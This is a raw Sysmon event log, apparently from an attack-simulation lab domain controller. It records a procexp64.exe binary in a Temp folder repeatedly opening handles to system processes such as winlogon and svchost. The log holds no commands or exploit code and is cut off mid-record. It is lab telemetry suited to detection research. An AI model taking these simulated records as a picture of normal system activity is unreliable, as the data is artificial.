15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program 